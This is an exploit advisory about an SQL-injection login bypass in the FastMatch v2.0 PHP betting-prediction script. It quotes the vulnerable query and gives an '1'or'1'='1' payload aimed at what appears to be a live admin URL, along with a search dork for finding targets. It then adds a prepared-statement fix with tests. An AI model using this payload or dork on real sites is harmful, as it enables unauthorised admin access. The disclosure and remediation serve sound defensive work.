======================================================================================
| # Title : FastMatch v2.0 İddaa Tahmin Scripti auth bypass vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Tested on : Windows 8.1 French V.(Pro)
| # Version : v2.0
| # Vendor : http://wmscripti.com/php-scriptler/fastmatch-iddaa-tahmin-scripti.html
| # Dork : "FastMatch | İddaa Tahminleri Beta"
======================================================================================
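PoC :

login.php
line 9 : $bul = mysql_query("select * from admin where kadi='$user' && sifre='$pass'");

$user and $pass are interpolated directly into the SQL string, so a single quote in either field changes the WHERE clause and the admin login succeeds without valid credentials.

http://v2.zkulubu.com/admin/
user : 1'or'1'='1
pass : 1'or'1'='1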
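
Fix for line 9, as an added example (not the vendor's code and not part of the original advisory): the lookup is done with a PDO prepared statement and the password is checked with password_verify(). The table and column names (admin, kadi, sifre) come from the query above; the function name admin_login, the hashed storage of sifre and the in-memory SQLite database standing in for MySQL are assumptions.

```php
<?php
declare(strict_types=1);

// Hypothetical replacement for the login check in login.php.
// Returns true only when the user exists and the password matches its hash.
function admin_login(PDO $db, string $user, string $pass): bool
{
    // The placeholder keeps $user out of the SQL text: quotes in the input
    // are compared as data and cannot alter the WHERE clause.
    $stmt = $db->prepare('SELECT sifre FROM admin WHERE kadi = :kadi LIMIT 1');
    $stmt->execute([':kadi' => $user]);
    $hash = $stmt->fetchColumn(); // false when no row matches

    // The password never enters the query; it is verified against the
    // stored hash (assumption: sifre holds a password_hash() value).
    return is_string($hash) && password_verify($pass, $hash);
}

// Constructed fixture: in-memory SQLite stands in for the MySQL database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE admin (kadi TEXT PRIMARY KEY, sifre TEXT NOT NULL)');
$ins = $db->prepare('INSERT INTO admin (kadi, sifre) VALUES (?, ?)');
$ins->execute(['admin', password_hash('constructed-sample-pw', PASSWORD_DEFAULT)]);

// Constructed cases: valid login, wrong password, and the PoC input above.
$cases = [
    ['admin', 'constructed-sample-pw', true],
    ['admin', 'wrong-password', false],
    ["1'or'1'='1", "1'or'1'='1", false],
];

foreach ($cases as [$user, $pass, $expected]) {
    $ok = admin_login($db, $user, $pass);
    printf("%-12s => %s\n", $user, $ok ? 'accepted' : 'rejected');
    if ($ok !== $expected) {
        throw new RuntimeException("unexpected result for user '$user'");
    }
}
```

The mysql_* functions used on line 9 were removed in PHP 7.0, so moving to PDO (or mysqli) prepared statements is also required for the script to run on a supported PHP version.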
Greetings to :
======================================================================================
| jericho * Larry W. Cashdollar * brutelogic * shadow_00715 * 9aylas * djroot.dz * LiquidWorm * Hussin-X * D4NB4R * ViRuS_Ra3cH * yasMouh
======================================================================================